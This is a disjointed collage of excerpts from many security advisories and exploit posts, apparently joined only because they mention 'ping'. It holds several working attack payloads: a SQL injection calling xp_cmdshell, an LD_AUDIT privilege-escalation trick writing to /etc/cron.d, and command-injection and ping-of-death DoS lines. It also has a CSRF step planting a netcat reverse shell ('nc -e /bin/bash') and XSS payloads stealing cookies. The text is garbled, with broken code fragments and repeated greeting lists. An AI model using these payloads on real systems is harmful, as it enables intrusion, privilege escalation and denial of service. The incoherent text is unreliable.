Echo Request
As expected, the following request will be identified and blocked (depending
on configuration) by the IBM Web application firewall.
http://sitename/find_ta_def.aspx?id=2571&iid='; EXEC
master..xp_cmdshell "ping 10.1.1.3" --
IIS with ASP.NET (and even pure ASP) technology will concatenate the contents
of a parameter if multiple entries are part of the request.
Workaround Bypass:
==================
Craft the packets in a way so that the first fragment has an ICMPv6 echo
request and the second fragment overwrites the first fragment with the
ICMPv6 router advertisement.
Fragment 1:
IPv6 Header
Fragmentation Header
CVE-2008-0530 and Cisco Bug IDs CSCsj74818 and CSCsk21863.
SCCP-Only Related Vulnerabilities
* Large ICMP Echo Request DoS
Cisco Unified IP Phone 7940, 7940G, 7960 and 7960G devices
running SCCP firmware contain a DoS vulnerability. It is possible
to cause a vulnerable device to reboot by sending a large ICMP
echo request packet. This vulnerability is corrected in SCCP
More Details
============
The OmniPCX web interface has a CGI script "masterCGI" which offers a
"ping" functionality. By running the script with the parameters "ping"
and "user", one is able to ping any IP address reachable from the server
the web interface is running on.
curl -k "https://www.example.com/cgi-bin/masterCGI?ping=nomip&user=127.0.0.1"
-rw-r--r-- 1 root root 5496 2010-10-12 03:32 /lib/libpcprofile.so
# We identified one of the pcprofile constructors is unsafe to run with
# elevated privileges, as it creates the file specified in the output
# environment variable.
$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: undefined symbol: la_version; ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
208.67.219.0/24; # change.
reject_policy = fail; # If you do not provide any alternative server
# sections, like the following root-server
# example, "negate" may be more appropriate here.
timeout = 4;
uptest = ping; # Test availability using ICMP echo requests.
ping_timeout = 100; # ping test will time out after 10 seconds.
interval = 15m; # Test every 15 minutes.
preset = off;
}
*/
Using a simple ping command in the password field, an attacker could use timing
attacks to verify the presence of the vulnerability:
| ping -c 10 <<HOST>>
The ping command above will attempt to send 10 ICMP echo requests to the
target host, resulting in a noticeable delay easily detected by vulnerability
scanners.
Versions Affected
-----------------
These vulnerabilities are documented in the following Cisco bug IDs:
* Cisco bug ID CSCsi13344 - XSS in IOS HTTP Server
Special Characters are not escaped in URL strings sent to the
HTTP server.
* Cisco bug ID CSCsr72301 - XSS in IOS HTTP Server (ping parameter)
Special Characters are not escaped in URL strings sent to the
HTTP server, via the ping parameter. The ping parameter is used
both by external applications such as Router and Security Device
Manager (SDM) as well as a direct HTTP session to Cisco IOS http
server. This vulnerability affects 12.1E based trains and all
[DCA-0001]
[Dlink Di-604 router authenticated user ping tool Xss and DoS]
[vendor product description]
The DI-604 combines the latest advancements in chip technology,
low-cost design and manufacturing with new, feature-rich firewall and
network management controls to give you quite possibly the most
advanced, yet affordable Ethernet router to date.
Nortel IP phone DoS
Discovered: 2008-02-25
Tested on firmware: 0604DAS (Latest firmwares have also been tested.)
Welcome the return of the Ping of Death!
wait a minute...isn't this 2008?
Steps to reproduce:
1. ping -s 65500 < ip of the phone >
WAS Samples:
2. PlantsByWebSphere Sample multiple XSS vulnerabilities.
3. JAX-WS Web Services MTOM Sample XSS vulnerability.
4. JAX-WS Web Services Ping and Echo Sample multiple XSS vulnerabilities.
5. Dynamic Query - Employee Finder Sample multiple XSS vulnerabilities.
6. Dynamic Query - EJB Data Mediator Service Sample XSS vulnerability.
7. Application Profile - Account Management Sample multiple XSS vulnerabilities.
8. Scheduler Account Report Sample multiple XSS vulnerabilities.
executed it? ZoneAlarm would be disarmed, leaving you exposed and
unprotected.
Preliminaries
Firstly setup a continuous ping or similar to the system being tested, so as
to verify that ZoneAlarm is working and blocking these.
Step-by-step illustration
There is an unbelievably simple local r00t bug in recent FreeBSD versions.
I audited FreeBSD for local r00t bugs a long time *sigh*. Now it pays out.
The bug resides in the Run-Time Link-Editor (rtld).
Normally rtld does not allow dangerous environment variables like LD_PRELOAD
to be set when executing setugid binaries like "ping" or "su".
With a rather simple technique rtld can be tricked into
accepting LD variables even on setugid binaries.
See the attached exploit for details.
Example exploiting session
I. ABOUT THE APPLICATION
________________________
MyCart is a collection of PHP scripts that setup the
backbone of a shopping cart or on-line ordering system.
II. DESCRIPTION
_______________
by or originated from the device. Transit traffic will not trigger this
vulnerability.
Both connections to and from the router could trigger this
vulnerability. An example of a connection to the router is that you may
still be able to ping the device, but fail to establish a TELNET or SSH
connection to the device. For example, an administrator may still be
able to ping the device but fail to establish a Telnet or SSH connection
to the device. Administrators who attempt a Telnet or a SSH connection
to a remote device from the CLI prompt will encounter a hung session
and the "Trying <ip address|hostname> ..." prompt. The connection
defaultAdminRole=ZenUser&defaultPageSize:int=40&email=&eventConsoleRefresh:
boolean=True&manage_editUserSettings:method=Save&netMapStartObject=&pager=&
password=letmein&sndpassword=letmein&zenScreenName=editUserSettings
2. Change and execute a command CSRF.
Change the ping command to be a netcat shell out to a remote system. In
this case an internal system running on port 443
http://172.16.28.5:8080/zport/dmd/userCommands/ping?command:text=nc -e
/bin/bash 172.16.28.6 443&commandId=ping&description:text=&
manage_editUserCommand:method=Save&zenScreenName=userCommandDetail
* 05/01/2010: Vendor asks for more details including a complete bug analysis
and patches.
* 06/01/2010: Provide full analysis and patches to the vendor.
* 06/01/2010: Vendor claims to have silently patched the vulnerability in
their development branch.
* 01/03/2010: Ping vendor, who remains silent...
* 22/03/2010: Ping vendor, who remains silent...
* 20/07/2010: Inform the CERT about the vulnerability.
* 20/07/2010: Recontact CERT about this vulnerability.
* 03/08/2010: CERT gets back to us asking for details.
* 09/08/2010: Send available information to the CERT.
SUMMARY
WowWee Rovio - Insufficient Access Controls - Covert Audio/Video
Snooping Possible
OVERVIEW
Rovio from WowWee does not adequately secure all accessible URLs or media
streams, enabling an unauthorized user with network access to the robotic
webcam platform the ability to listen to and view audio/video streamed from
* userfilter parameter of pvm_user_management.php resource.
url_placeholder/pvm_user_management.php?userfilter=1%22+onblur%3D%22alert%28%27xss%27%29
* ping parameter of sys_tools.php
url_placeholder/sys_tools.php?form=ping&page=sys_ping.php&ping=<script>alert(document.cookie)</script>
* action parameter of pvm_cert_commaction.php resource
- 13 - 06 - 2008 advisory released
---------------------------------------------------------------------------
Shoutz:
~~~~~
~ ping - my dearest wife, zautha my little warrior "happy birthday, dear"
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,negative,
the_hydra,neng chika, str0ke
~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOSIATES
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,
super_temon, b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
===========
Multiple vulnerabilities have been reported in Nagios:
* Paul reported that statuswml.cgi does not properly sanitize shell
metacharacters in the (1) ping and (2) traceroute parameters
(CVE-2009-2288).
* Nagios does not properly verify whether an authenticated user is
authorized to run certain commands (CVE-2008-5027).
- 7 - 08 - 2007 advisory released
---------------------------------------------------------------------------
Shoutz:
~~~~
~ ping - my dearest wife, zautha my little son, for all the luv the tears n the breath
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,negative, str0ke (for the best comments)
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw
~ SinChan,h4ntu,cow_1seng,sakitjiwa, m_beben, rizal, cR4SH3R, madkid, kuntua, stev_manado, nofry, x16
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net
- 05 - 05 - 2008 advisory released
---------------------------------------------------------------------------
Shoutz:
~~~~~
~ ping - my dearest wife, zautha my light of eyes, for all the luv the tears n the breath
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v, az01,negative,the_hydra,neng chika, str0ke
~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOSIATES
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,super_temon,b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy, ketut, rizal, cR4SH3R, kuntua, stev_manado, nofry,k1tk4t,0pt1c
~ newbie_hacker@yahoogroups.com
- 30 - 05 - 2008 advisory released
---------------------------------------------------------------------------
Shoutz:
~~~~
~ ping - my dearest wife, zautha my little angel, for all the luv the tears n the breath
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az01,negative,the_hydra,neng chika, str0ke
~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOSIATES
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,super_temon,b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R,kuntua,stev_manado,nofry,k1tk4t,0pt1c
~ newbie_hacker@yahoogroups.com
- 14 - 07 - 2008 advisory released
---------------------------------------------------------------------------
Shoutz:
~~~~~
~ ping - my dearest wife "happy birthday darling", zautha - my beloved son
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,negative,
the_hydra,neng chika, str0ke
~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,
super_temon, b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
---------------------------------------------------------------------------
Shoutz:
~~~~
~ "Happy 5th Anniversary" for ECHO.
~ ping - my dearest wife, zautha - my beloved son, and my beloved next children.
~ "Happy Wedding" for (y3dips,the_day,Negatif),moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,
the_hydra,neng chika, str0ke
~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
~ SK,pokleyzz,Abond,an0maly,cybertank, super_temon, b120t0,inggar,fachri,adi,rahmat,indra
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,cyb3rh3b
- 24 - 06 - 2008 advisory released
---------------------------------------------------------------------------
Shoutz:
~~~~
~ ping - my dearest wife, zautha - my little warrior
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,negative,
the_hydra,neng chika, str0ke
~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,
super_temon, b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
check(ip)
return suck
def check(ip):
    print "[+] No HTTP response..."
    print "[+] Server and network should go down!"
    print "[+] Check it with ping..."
    os.system("ping "+ip)
i=0
print "[!] Neostrada Livebox Remote Network Down Exploit!!"
print "[!] [HTTP DoS vuln] "
print "[!] by 0in [0in.email(at)gmail.com] "